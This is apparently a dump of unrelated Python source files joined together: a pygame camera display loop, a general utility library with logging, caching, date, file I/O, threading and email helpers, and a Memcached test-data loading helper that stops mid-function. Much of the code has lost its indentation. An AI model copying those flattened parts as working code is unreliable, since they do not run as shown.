if screenMode >= Mode.VIEWFINDER: # Viewfinder or settings modes
stream = io.BytesIO() # Capture into in-memory stream
camera.capture(stream, resize=sizeData[sizeMode][1],
use_video_port=True, format='rgb')
stream.seek(0)
stream.readinto(rgb)
stream.close()
img = pygame.image.frombuffer(rgb[0:
(sizeData[sizeMode][1][0] * sizeData[sizeMode][1][1] * 3)],
sizeData[sizeMode][1], 'RGB')
elif screenMode in [Mode.PLAYBACK, Mode.DELETE]:
img = imgSurface # Show last-loaded image
else: # 'No Photos' mode
img = None # You get nothing, good day sir
if img is None or img.get_height() < 240: # Letterbox, clear background
screen.fill(0)
if img:
screen.blit(img,
((320 - img.get_width() ) / 2,
(240 - img.get_height()) / 2))
# Overlay buttons on display and update
for i,b in enumerate(buttons[screenMode]):
b.draw(screen)
pygame.display.update()
screenModePrior = screenMode
|
slibtk.py
|
"""
standard library tool-kit
this module contains commonly used functions to process and manipulate standard library objects
"""
import csv
import functools
import itertools
import json
import logging
import os
import pickle
import random
import re
import sys
import time
from collections import namedtuple, defaultdict, OrderedDict
from concurrent.futures import as_completed, ProcessPoolExecutor
from concurrent.futures.thread import ThreadPoolExecutor
from datetime import timedelta
from threading import Thread
import psutil
from dateutil.relativedelta import relativedelta
from tqdm import tqdm
from slibtk.core import *
import smtplib
import os
from email.message import EmailMessage
import sys
import traceback
from pathlib import Path
import statistics
logger = logging.getLogger(__name__)
# decorators ###########################################################################################################
def log_input():
return log_input_and_output(input_flag=True, output_flag=False)
def log_output():
return log_input_and_output(input_flag=False, output_flag=True)
def log_input_and_output(input_flag=True, output_flag=True, positional_input_index: int = 0,
kw_input_key: Optional[Hashable] = None):
"""logs the input (first positional argument) and output of decorated function, you can specify a specific kw
arg to be logged as input by specifying its corresponding param key"""
def outer_wrapper(func):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
if input_flag:
if kw_input_key:
# noinspection PyTypeChecker
input_arg = kwargs[kw_input_key]
else:
input_arg = _get_positional_arg(args, kwargs, positional_input_index)
logger.info(f'{func.__name__}: input={input_arg}'[:300])
result = func(*args, **kwargs)
if output_flag:
logger.info(f'{func.__name__}: output={result}'[:300])
return result
return inner_wrapper
return outer_wrapper
def _get_positional_arg(args, kwargs, index: int = 0) -> Any:
    """return the positional arg at `index`; if there are only kw args, return the kw arg value at that position"""
    try:
        input_arg = args[index]
    except IndexError:
        input_arg = list(kwargs.values())[index]
    return input_arg
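# illustrative sketch of the decorator above: log the first positional arg on
# the way in and the return value on the way out
@log_input_and_output()
def _example_double(x: int) -> int:
    return x * 2
assert _example_double(2) == 4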
def sleep_before(secs_before: float):
"""call the sleep function before the decorated function is called"""
return sleep_before_and_after(secs_before=secs_before, secs_after=0)
def sleep_after(secs_after: float):
"""call the sleep function after the decorated function is called"""
return sleep_before_and_after(secs_before=0, secs_after=secs_after)
def sleep_before_and_after(secs_before: float = 0, secs_after: float = 0):
"""call the sleep method before and after the decorated function is called, pass in the sleep duration in
seconds. Default values are 0."""
def outer_wrapper(func):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
if secs_before:
time.sleep(secs_before)
result = func(*args, **kwargs)
if secs_after:
time.sleep(secs_after)
return result
return inner_wrapper
return outer_wrapper
def timer(func):
"""decorator that logs the time taken for the decorated func to run"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
start: float = time.time()
result = func(*args, **kwargs)
hr_time_elapsed: str = hr_secs(time.time() - start)
logger.info(f'time taken {func.__name__}: {hr_time_elapsed}')
return result
return wrapper
def runtimes(arg_values: Sequence):
"""decorator that records the runtime (seconds) for several values of a single
argument that is passed to the decorated func, returning the argument: second
pairs in a dictionary"""
def outer_wrapper(func: Callable):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
logger.info(f'monitoring runtimes for func={func.__name__}, values={arg_values}')
times = {}
for value in arg_values:
start = time.time()
func(value, *args, **kwargs)
seconds = time.time() - start
times[value] = seconds
logger.info(f'param={value} seconds={seconds}')
return times
return inner_wrapper
return outer_wrapper
def average_timer(n_runs: int):
"""decorator that logs the average time taken for `n_runs` of the decorated"""
def outer_wrapper(func: Callable):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
times = []
for _ in range(n_runs):
start = time.time()
func(*args, **kwargs)
times.append(time.time() - start)
mil = 1_000_000
print(
f'n_runs: {n_runs}, average time taken: {statistics.mean(times) * mil:.3f}us, min: {min(times) * mil:.3f}us')
return func(*args, **kwargs)
return inner_wrapper
return outer_wrapper
class RunTimes:
"""
stores run-times of methods in the programme and can display totals
"""
times = defaultdict(list)
@classmethod
def add_time(cls, method_nm, runtime: float) -> None:
cls.times[method_nm].append(runtime)
@classmethod
def _max_method_len(cls):
return max([len(key) for key in cls.times.keys()])
@classmethod
def show_total_times(cls) -> None:
"""print print the total cumulative runtime of each decorated method"""
for method, times in cls.times.items():
print(f'{method:}:'.ljust(cls._max_method_len() + 1), sum(times))
@classmethod
def get_method_runtime(cls, method_nm: str = None):
"""stores the runtime of decorated callable in RunTimes"""
def outer_wrapper(func):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
name = method_nm if method_nm else func.__name__
cls.add_time(name, time.time() - start)
return result
return inner_wrapper
return outer_wrapper
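# Illustrative sketch (hypothetical name): every call to the decorated function
# appends its runtime under 'load_data'; RunTimes.show_total_times() then
# prints one cumulative total per name.
@RunTimes.get_method_runtime('load_data')
def _example_load_data() -> None:
    pass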
def with_cache(path: PathOrStr, use_cache: bool = True, fname: Optional[str] = None) -> Callable:
"""
decorator that will use a pickled version of a functions return if it exists when the function called else it will
execute the function as normal
Parameters
----------
path: cache file location
    use_cache: flag that allows you to override the default behavior of reading from the cache
    fname: optional cache file name (currently unused)
Returns
-------
outer_wrapper: the decorated function callable
"""
path = Path(path)
def _outer_wrapper(func):
@functools.wraps(func)
def _inner_wrapper(*args, **kwargs):
if (path / f'{func.__name__}.pickle').exists() and use_cache:
cached = read_pickle((path / f'{func.__name__}.pickle'))
logger.info(f'loaded return from cache: {func.__name__}')
return cached
            result = func(*args, **kwargs)
            if not (path / f'{func.__name__}.pickle').exists():
                logger.info('no cache exists')
            write_pickle(result, (path / f'{func.__name__}.pickle'))
            logger.info(f'saved return to cache: {func.__name__}')
return result
return _inner_wrapper
return _outer_wrapper
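# Illustrative usage sketch (hypothetical path and function): the first call
# pickles the return to /tmp/slow_compute.pickle; subsequent calls load it.
#
# @with_cache('/tmp')
# def slow_compute():
#     return expensive_query()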
# string tools #########################################################################################################
def re_no_decimal_places(s: str):
return re.sub(r'(\d*)\.(\d*)', r'\1', s)
def re_n_decimal_places(s: str, n: int = 0) -> str:
matches = re.findall(r'(\d+)(\.\d*)', s)
for match in matches:
s = s.replace(''.join(match), match[0] + match[1][:n + 1])
return s if n > 0 else re_no_decimal_places(s)
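# illustrative checks of the decimal-place helpers above
assert re_no_decimal_places('pi is 3.14159') == 'pi is 3'
assert re_n_decimal_places('pi is 3.14159', 2) == 'pi is 3.14'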
def camel2snake(s: str) -> str:
s = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', s)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s).lower()
def snake2camel(s: str) -> str:
snake_re = re.compile('_?[a-z]+_?')
return ''.join([word.strip('_').capitalize() for word in snake_re.findall(s)])
def to_slug(s: str):
"""covert string to slug format
before: Hello world!!
after: hello_world"""
s = str(s)
s = re.sub('[^\w\s]+', '', s)
return '_'.join(s.lower().split())
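# illustrative checks of the case and slug converters above
assert camel2snake('HTTPResponseCode') == 'http_response_code'
assert snake2camel('http_response_code') == 'HttpResponseCode'
assert to_slug('Hello world!!') == 'hello_world'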
def prefix_if_first_is_digit(s) -> str:
"""if the first item of a string is a digit prefix it with an underscore"""
if s[0].isdigit():
return '_' + s
return s
def replace(text: str, items: Union[Dict, Tuple]) -> str:
"""Execute a sequence of find and replace pairs on a string."""
if isinstance(items, dict): items = items.items()
for k, v in items:
text = text.replace(k, v)
return text
def trim(string: str) -> str:
"""remove all escape characters and double white spaces"""
return ' '.join(string.replace(u'\xa0', u' ').split())
def hr_bytes(n_bytes: int, binary=False, decimal_places=1):
"""return bytes in a human readable format"""
if binary:
factor, units = 1024, ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB']
else:
factor, units = 1000, ['B', 'KB', 'MB', 'GB', 'TB', 'PB']
for unit in units:
if n_bytes < factor:
break
n_bytes /= factor
return f"{n_bytes:.{decimal_places}f}{unit}"
def hr_numbers(num: float, decimal_places: int = 1) -> str:
"""return number in human readable format"""
scale = 1000
units = ['', 'K', 'M', 'B', 'T']
for unit in units:
if abs(num) < scale:
break
num /= scale
return f'{num:,.{decimal_places}f}{unit}'
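# illustrative checks of the human-readable formatters above
assert hr_bytes(1_500_000) == '1.5MB'
assert hr_bytes(2048, binary=True) == '2.0KiB'
assert hr_numbers(1_234_567) == '1.2M'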
def grep_(pattern: str, text: str, window: int = 30) -> List[str]:
"""text pattern matches of length plus and minus window"""
matches = []
for match in re.finditer(pattern, string=text, flags=re.IGNORECASE):
matches.append(text[match.start() - window:match.start() + window])
return matches
# iterable tools #######################################################################################################
def is_listy(x: Any) -> bool: return isinstance(x, (tuple, list))
def listify(x: Any) -> List:
"""Make `x` a list"""
if isinstance(x, str): x = [x]
if not isinstance(x, Iterable): x = [x]
return list(x)
assert isinstance(listify(['hello', 'world']), list)
assert isinstance(listify('hello world'), list)
assert isinstance(listify(range(5)), list)
def uniqueify(items: Iterable) -> List:
"""remove duplicates from iterable and preserve order"""
return list(OrderedDict.fromkeys(items).keys())
def recurse_sum(x):
"""recursively sum floats and ints in any combination of nested lists and dicts"""
numbers = []
def cache_numbers(x: Any) -> None:
if isinstance(x, (float, int)): numbers.append(x)
return x
recurse(cache_numbers, x)
return sum(numbers)
def recurse(func: Callable, x: Any, *args, **kwargs) -> Any:
"""recursively apply func to any combination of nested lists and dicts"""
if isinstance(x, (list, tuple)): return [recurse(func, o, *args, **kwargs) for o in x]
if isinstance(x, dict): return {k: recurse(func, v, *args, **kwargs) for k, v in x.items()}
return func(x, *args, **kwargs)
def wildcard_filter(items: Iterable, query: str) -> List[str]:
"""filter a list by query, can accept a wildcard search"""
return [x for x in items if re.search(query, str(x))]
def map_with_special_case(items: Iterable, func_first: Callable, func_everything_else: Callable) -> Iterable:
"""map a function to an iterable with a special case function for the first item in the iterable"""
results = []
for i, item in enumerate(items):
if i > 0:
results.append(func_everything_else(item))
else:
results.append(func_first(item))
return results
def flattener(lst: List[List]) -> List:
"""flatten list"""
return list(itertools.chain.from_iterable(lst))
def transpose_grid(matrix: List[List]) -> List[Tuple[Any]]:
"""transpose a list matrix and return it"""
return list(zip(*matrix))
def make_every_combination(items) -> List[Tuple]:
"""return a list of every combination of the original list of items. For every subset lenght."""
combinations = []
for i in range(len(items) + 1):
combinations.extend(
list(itertools.combinations(items, i))
)
return combinations
# iterator / generator tools ###########################################################################################
def chunkify(seq: Sequence, size: int) -> Iterator[List]:
"""yield successive size-sized chunks from seq"""
for i in range(0, len(seq), size):
yield seq[i:i + size]
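# illustrative check: the trailing chunk may be shorter than size
assert list(chunkify(list(range(5)), 2)) == [[0, 1], [2, 3], [4]]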
def chunks_index(seq: List, size: int) -> Generator[Tuple[List, int], None, None]:
    """yield successive size-sized chunks from seq as ChunkIndex namedtuples pairing each chunk with its start index"""
    ChunkIndex = namedtuple('ChunkIndex', ['chunk', 'index'])
for i in range(0, len(seq), size):
yield ChunkIndex(chunk=seq[i:i + size], index=i)
# dictionary tools #####################################################################################################
def dict_sample(d: Dict, n_samples: int = 5) -> Dict:
    """randomly select a subset of a dictionary (without replacement)"""
    keys = random.sample(list(d), min(n_samples, len(d)))
    return {key: d[key] for key in keys}
# datetime tools #######################################################################################################
def current_date_minute() -> str:
"""return current date minute as a string e.g. '2021-02-02_0905'"""
return str(datetime.now().replace(microsecond=0)).replace(':', '').replace(' ', '_')[:-2]
def make_tsub(n: int) -> Tuple[datetime.date, datetime.date]:
"""return start and end date of the the 365 day period prior to today with an n year lag"""
assert n > 0, 'n must be positive'
year_lag = timedelta(days=(366 * (n - 1)))
end = datetime.now().date() - timedelta(days=1)
start = end - timedelta(days=365)
start, end = start - year_lag, end - year_lag
assert (end - start).days == 365
return start, end
def past_date(start: Optional[DateLike] = None, years: int = 0, months: int = 0, weeks: int = 0, days: int = 0,
as_str: bool = False, **kwargs) -> DateLike:
"""get a date x months/years ago from today or start if specified"""
if not start:
start = datetime.now()
if isinstance(start, str): start = datetime.fromisoformat(start)
date = start - relativedelta(years=years, months=months, weeks=weeks, days=days, **kwargs)
if as_str:
return date.date().isoformat()
return date
def hr_secs(secs: float) -> str:
"""format seconds human readable format hours:mins:seconds"""
secs_per_hour: int = 3600
secs_per_min: int = 60
hours, remainder = divmod(secs, secs_per_hour)
mins, seconds = divmod(remainder, secs_per_min)
return f'{int(hours):02}:{int(mins):02}:{seconds:05.2f}'
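# illustrative check: 3661.5 seconds is 1h 1m 1.5s
assert hr_secs(3661.5) == '01:01:01.50'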
def hr_secs_elapsed(start: float) -> str:
"""format seconds from elapsed since start in human readable format hours:mins:seconds"""
return hr_secs(time.time() - start)
# io in outs ##############################################################################################################
class FileTXT:
"""abstract class representing a text file"""
def __init__(self, path: Union[Path, str]):
self.path = Path(path) if isinstance(path, str) else path
def exists(self) -> bool:
return self.path.exists()
def show(self, num: int = 10) -> None:
with self.path.open() as f:
for i in range(num):
print(next(f))
def clear(self) -> None:
with self.path.open('w'):
pass
class ListTXT(FileTXT):
"""object to represent a text file containing a list"""
def __init__(self, path: Union[Path, str]):
super().__init__(path)
def write(self, lines: List) -> None:
"""save a list as a test file where each element corresponds to a line in the text file"""
with self.path.open('w') as f:
for line in tqdm(lines):
f.write(f'{str(line).strip()}\n')
logger.info(f'saved txt file: {self.path}')
def read(self) -> List:
"""parse text file into list"""
with self.path.open() as f:
lines = f.read().splitlines()
return lines
class LogTXT(FileTXT):
"""simple log file object"""
def __init__(self, path: Union[Path, str]):
super().__init__(path)
def write(self, line) -> None:
with self.path.open('a') as f:
f.write(f'{str(line).strip()}\n')
def read(self) -> List:
with self.path.open() as f:
lines = f.read().splitlines()
return lines
def clear(self) -> None:
with self.path.open('w'):
pass
class FileCSV:
"""simple csv file object"""
    def __init__(self, path: Union[Path, str]):
        self.path = Path(path) if isinstance(path, str) else path
def write(self, seq):
with self.path.open('w') as f:
writer = csv.writer(f)
for line in tqdm(seq):
writer.writerow(line)
    def read(self) -> Iterator:
        """lazily yield csv rows; the file stays open while the generator is consumed"""
        with self.path.open() as f:
            reader = csv.reader(f, delimiter=',')
            yield from reader
class IterLines:
"""lazy iterator for every file matched in a glob search"""
def __init__(self, path: Path, pattern: str):
self.path = path
self.pattern = pattern
self.files = path.rglob(pattern)
def __iter__(self):
for file in self.files:
for line in file.open():
yield line.split()
def date_versioned_dir(dst: Path) -> Path:
"""Make directory with name of current date in destination directory and return it"""
versioned_dir = dst / str(datetime.now().date())
versioned_dir.mkdir(exist_ok=True, parents=True)
return versioned_dir
def next_fname(path: PathOrStr) -> Path:
"""return next incremental file that does not exist (path.root)_{next_num}.(path.suffix)"""
path = Path(path)
parent, stem, suffix = path.parent, path.stem, path.suffix
i = 0
while (parent / f'{stem}_{i:02}{suffix}').exists():
i += 1
return parent / f'{stem}_{i:02}{suffix}'
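# Illustrative example: if report_00.txt and report_01.txt already exist,
#   >>> next_fname('report.txt')
#   PosixPath('report_02.txt')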
def extend_path_name(path: OptPathOrStr, ext: str) -> Optional[Path]:
"""concat string to the end of the path name but before the suffix"""
return path.parent / (f'{path.stem}_{ext}{path.suffix}') if path else None
@log_input()
def write_pickle(obj, path: PathOrStr) -> None:
"""write object to a pickle on your computer"""
path = Path(path)
with path.open('wb') as f:
pickle.dump(obj, f)
@log_output()
def read_pickle(path: PathOrStr):
"""return stored object from a pickle file"""
path = Path(path)
logger.info(f'reading pickle: {path}')
with path.open('rb') as f:
obj = pickle.load(f)
return obj
def write_json(obj, path: PathOrStr) -> None:
"""write object as json"""
path = Path(path)
with path.open('w') as f:
json.dump(obj, f)
def read_json(path: PathOrStr) -> Union[List, Dict]:
"""return stored object from a json file"""
path = Path(path)
with path.open() as f:
obj = json.load(f)
return obj
def read_jsonlines(filename: str) -> List[Dict]:
    """read a json lines file as a list of dictionaries"""
    data = []
    with open(filename, 'r') as f:
        for line in f:
            data.append(json.loads(line))
return data
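# Illustrative example: given a hypothetical users.jsonl containing
#   {"name": "ann"}
#   {"name": "bob"}
# read_jsonlines('users.jsonl') returns [{'name': 'ann'}, {'name': 'bob'}]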
def write_iterables(seq: Sequence[Sequence], path: Path):
with path.open('w') as f:
wr = csv.writer(f, delimiter=" ")
wr.writerows(seq)
def input_polar(msg, default='y'):
"""get a polar input from user"""
prompt = f'{msg}: [{default}]: '
while True:
user_input: str = input(prompt).lower()
if user_input == '':
return default
elif user_input not in ['y', 'n']:
print('Error: choose y or n')
continue
else:
break
return user_input
def input_text(msg, default):
"""get a text input from user. Prompt example=msg: [default]: """
prompt = f'{msg}: [{default}]: '
while True:
user_input: str = input(prompt).strip()
if user_input == '':
return default
else:
break
return user_input
def input_num_index(msg: str, choices: Dict[str, str], default='0') -> str:
"""get a numerical index from user"""
num_index = list(choices.keys())
num_index_comma_sep = ", ".join(num_index)
choice_str = '\n'.join([f'{index} - {option}' for index, option in choices.items()]) + '\n'
instruction = f'Choose from {num_index_comma_sep} [{default}]:'
prompt = f'{msg}:\n' + choice_str + instruction
while True:
user_index = input(prompt)
if user_index == '':
return default
elif user_index not in num_index:
print(f'Error: choose from {num_index_comma_sep}')
continue
else:
break
return user_index
# multi-processing/threading tools #####################################################################################
@timer
def multiproc_iter(iterable: Sequence, func: Callable, n_chunks: int = 16) -> List:
"""
    process a sequence as batches on multiple cpus, i.e. in parallel. Note: if cpu utilisation drops while the
    function is still hanging, there is probably an error in func.
Args:
iterable: item to be processed
func: callable applied to each chunk
n_chunks: number of chunk iterable will be split into
Returns:
iterable mapped by func
"""
logger.info(f'starting multi-processing with: {func.__name__}')
    size = max(1, len(iterable) // n_chunks)  # guard against size 0 when len(iterable) < n_chunks
chunks = chunkify(iterable, size)
with ProcessPoolExecutor(max_workers=os.cpu_count()) as e:
result = e.map(func, list(chunks))
return [item for chunk in result for item in chunk]
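# Usage sketch (square_all is a hypothetical function; it must live at module level so it
# can be pickled by ProcessPoolExecutor, and it receives a whole chunk at a time):
#   def square_all(chunk):
#       return [x * x for x in chunk]
#   squares = multiproc_iter(list(range(10_000)), square_all, n_chunks=8)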
def multi_proc_progress(iterable: Sequence, func: Callable, n_chunks: int = 16) -> List:
logger.info(f'starting multi-processing with: {func.__name__}')
    size = max(1, len(iterable) // n_chunks)  # guard against size 0 when len(iterable) < n_chunks
chunks = chunkify(iterable, size)
with ProcessPoolExecutor(max_workers=os.cpu_count()) as ex:
futures = [ex.submit(func, chunk) for chunk in chunks]
results = []
for f in tqdm(as_completed(futures), total=n_chunks):
results.append(f.result())
return [item for chunk in tqdm(results) for item in chunk]
stop_threads: bool = False
def terminal_timer(refresh_period: float = 1) -> None:
"""periodically log time elapsed to the terminal, this function is intended to be run as a thread which can
be ended safely by updating a global flag."""
start = time.time()
global stop_threads
while not stop_threads:
time.sleep(refresh_period)
secs_elapsed = int(time.time() - start)
logger.info(f'time elapsed: {hr_secs(secs_elapsed)}')
logger.info('timer thread ended.')
stop_threads = False
def run_with_terminal_timer(refresh_period: float = 1):
"""
    decorator that periodically prints the time elapsed during the decorated function's runtime. It does this by starting
    a timer in a separate thread; the thread is ended safely when the decorated function finishes.
Args:
refresh_period: how often timer prints to terminal in seconds
"""
def outer_wrapper(func):
@functools.wraps(func)
def inner_wrapper(*args, **kwargs):
thread = Thread(target=terminal_timer, args=(refresh_period,))
thread.start()
result = func(*args, **kwargs)
global stop_threads
stop_threads = True
return result
return inner_wrapper
return outer_wrapper
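# Usage sketch (slow_job is hypothetical):
#   @run_with_terminal_timer(refresh_period=5)
#   def slow_job():
#       time.sleep(30)
#   slow_job()  # logs the elapsed time every 5 seconds until it returns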
def server_request(query: str):
    """mock server request: sleeps for a few seconds and returns dummy data (used to demo async_sql_queries)"""
    print(f'starting: {query}')
time.sleep(random.randint(5, 8))
print(f'completed: {query}')
return [random.randint(1, 10) for _ in range(10)]
def async_sql_queries(queries: Union[List, Tuple], max_workers: int = 3, refresh_period: int = 1):
"""make and return the output of asynchronous sql requests with timer"""
global stop_threads
data: List = []
thread_timer = Thread(target=terminal_timer, args=(refresh_period,))
with ThreadPoolExecutor(max_workers=max_workers) as executor:
results = [executor.submit(server_request, query) for query in queries]
thread_timer.start()
for f in as_completed(results):
data.append(f.result())
stop_threads = True
return data
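# Usage sketch: server_request above is a stand-in mock, so any strings work here:
#   results = async_sql_queries(['select 1', 'select 2', 'select 3'], max_workers=2)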
# operating system #####################################################################################################
def get_size_hr(obj: Any) -> str:
"""get object size in human readable format"""
return hr_bytes(sys.getsizeof(obj))
def py_process_memory() -> str:
"""get memory consumption of current python process in human readable format"""
process = psutil.Process(os.getpid())
return hr_bytes(process.memory_info().rss)
# memory & runtime tools ###############################################################################################
def show_vars(*args):
"""Print an arbitrary number of variable names with their assigned value. Iterate over all global variables until
it finds ones with a matching memory reference."""
pairs = {k: v for k, v in globals().items() if id(v) in map(id, args)}
print(pairs)
def var_nm(var: Any) -> str:
"""return the variable name of any object as a string"""
return [k for k, v in globals().items() if id(var) == id(v)][0]
if __name__ == '__main__':
pass
# errors / tracebacks ##################################################################################################
def make_error_log() -> str:
"""if called once an exception has been raised This function returns a string error log (including type,
msg and traceback)"""
ex_type, ex_value, ex_traceback = sys.exc_info()
trace_back = traceback.extract_tb(ex_traceback)
stack_trace = [f"File : {tr[0]} , Line : {tr[1]}, Func.Name : {tr[2]}, Message : {tr[3]}" for tr in trace_back]
stack_trace = '\n\t'.join(stack_trace)
error_log: str = (f"Exception type: {ex_type.__name__}\n"
f"Exception message: {ex_value}\n"
f"Stack trace:\n\t {stack_trace}")
return error_log
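# Usage sketch (risky() is hypothetical): call make_error_log from inside an except block,
# since it relies on sys.exc_info():
#   try:
#       risky()
#   except Exception:
#       logger.error(make_error_log())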
# emails ###############################################################################################################
def send_email(to: str, subject: str, body: str) -> None:
"""send a text email to a passed email address. the sender email address is sourced from an
environment variable"""
address = os.environ['EMAIL_ADDRESS']
msg = EmailMessage()
msg['From'] = address
msg['To'] = to
msg['Subject'] = subject
msg.set_content(body)
    # to add a text file attachment, e.g.:
    # msg.add_attachment(df.to_csv(index=False), filename='data.csv')
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:
smtp.login(address, os.environ['EMAIL_PASSWORD'])
smtp.send_message(msg)
def send_error_log_email(to: str) -> None:
"""
If an exception is raised send an error log message to param email
example
-------
try:
def app():
something
app()
except Exception as e:
error_log = montk.make_error_log()
montk.send_error_log_email(to=os.environ['EMAIL_ADDRESS'])
"""
error_log = make_error_log()
send_email(to=to, subject=f'Error in app: {Path(__file__).name}', body=error_log)
# monkey patching standard library classes #############################################################################
Path.ls = lambda self: list(self.iterdir())
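# Illustrative example of the monkey patch (output is hypothetical):
#   >>> Path('.').ls()
#   [PosixPath('main.py'), PosixPath('data')]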
|
data_helper.py
|
import copy
import socket
from multiprocessing.process import BaseProcess as Process
from multiprocessing.queues import Queue
import random
import time
from random import Random
import uuid
from TestInput import TestInputServer
from TestInput import TestInputSingleton
import logger
import zlib
import crc32
import hashlib
import threading
from mc_bin_client import MemcachedClient, MemcachedError
from mc_ascii_client import MemcachedAsciiClient
from memcached.helper.old_kvstore import ClientKeyValueStore
from membase.api.rest_client import RestConnection, RestHelper, Bucket, vBucket
from memcacheConstants import ERR_NOT_FOUND, ERR_NOT_MY_VBUCKET, ERR_ETMPFAIL, ERR_EINVAL, ERR_2BIG
import json
import sys
from perf_engines import mcsoda
import memcacheConstants
import server_ports
from queue import Queue
from threading import Thread
log = logger.Logger.get_logger()
try:
import concurrent.futures
except ImportError:
log.warning("{0} {1}".format("Can not import concurrent module.",
"Data for each server will be loaded/retrieved sequentially"))
class MemcachedClientHelperExcetion(Exception):
def __init__(self, errorcode, message):
Exception.__init__(self, errorcode, message)
self._message = message
self.errorcode = errorcode
self._args = (errorcode, message)
class MemcachedClientHelper(object):
    # value_sizes {10: 0.1, 20: 0.2, 40: 0.8}
@staticmethod
def create_threads(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
async_write=False,
delete_ratio=0,
expiry_ratio=0,
collection=None):
log = logger.Logger.get_logger()
if not servers:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="servers is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
list = []
if ram_load_ratio >= 0:
info = RestConnection(servers[0]).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
            # the local variable 'list' shadows the builtin here, so iterate .items() directly
            for size, probability in value_size_distribution.items():
how_many = int(space_to_fill / (size + 250) * probability)
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
else:
for size, probability in value_size_distribution.items():
                how_many = number_of_items * probability  # divided per-thread below, matching create_threads_for_load_bucket
payload_generator = DocumentGenerator.make_docs(number_of_items,
{"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": str(uuid.uuid4())})
list.append({'size': size, 'value': payload_generator, 'how_many': how_many})
for item in list:
item['how_many'] //= int(number_of_threads)
# at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
            # choose one of the servers at random
thread = WorkerThread(serverInfo=MemcachedClientHelper.random_pick(servers),
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
async_write=async_write,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
collection=collection)
threads.append(thread)
return threads
@staticmethod
def create_threads_for_load_bucket(serverInfo=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0,
collection=None):
log = logger.Logger.get_logger()
if not serverInfo:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="serverInfo is not set")
if ram_load_ratio < 0 and number_of_items < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio or number_of_items must be specified")
if not value_size_distribution:
value_size_distribution = {16: 0.33, 128: 0.33, 1024: 0.33}
list = []
if ram_load_ratio >= 0:
info = RestConnection(serverInfo).get_bucket(name)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
            # the local variable 'list' shadows the builtin here, so iterate .items() directly
            for size, probability in value_size_distribution.items():
                # assume roughly 250 bytes of overhead per key
                how_many = int(space_to_fill / (size + 250) * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
else:
            for size, probability in value_size_distribution.items():
how_many = (number_of_items * probability)
payload = MemcachedClientHelper.create_value('*', size)
list.append({'size': size, 'value': payload, 'how_many': how_many})
for item in list:
item['how_many'] //= int(number_of_threads)
# at least one element for each value size
if item['how_many'] < 1:
item['how_many'] = 1
msg = "each thread will send {0} items with value of size : {1}"
log.info(msg.format(item['how_many'], item['size']))
threads = []
for i in range(0, int(number_of_threads)):
thread = WorkerThread(serverInfo=serverInfo,
name=name,
values_list=list,
override_vBucketId=override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
collection=collection)
threads.append(thread)
return threads
@staticmethod
def load_bucket_and_return_the_keys(servers=None,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
override_vBucketId=-1,
write_only=False,
moxi=True,
delete_ratio=0,
expiry_ratio=0,
collection=None):
inserted_keys = []
rejected_keys = []
log = logger.Logger.get_logger()
threads = MemcachedClientHelper.create_threads(servers,
name,
ram_load_ratio,
number_of_items,
value_size_distribution,
number_of_threads,
override_vBucketId,
write_only=write_only,
moxi=moxi,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
collection=collection)
# we can start them!
for thread in threads:
thread.start()
log.info("waiting for all worker thread to finish their work...")
[thread.join() for thread in threads]
log.info("worker threads are done...")
inserted_count = 0
rejected_count = 0
deleted_count = 0
expired_count = 0
for thread in threads:
t_inserted, t_rejected = thread.keys_set()
inserted_count += thread.inserted_keys_count()
rejected_count += thread.rejected_keys_count()
deleted_count += thread._delete_count
expired_count += thread._expiry_count
inserted_keys.extend(t_inserted)
rejected_keys.extend(t_rejected)
msg = "inserted keys count : {0} , rejected keys count : {1}"
log.info(msg.format(inserted_count, rejected_count))
msg = "deleted keys count : {0} , expired keys count : {1}"
log.info(msg.format(deleted_count, expired_count))
return inserted_keys, rejected_keys
@staticmethod
def load_bucket(servers,
name='default',
ram_load_ratio=-1,
number_of_items=-1,
value_size_distribution=None,
number_of_threads=50,
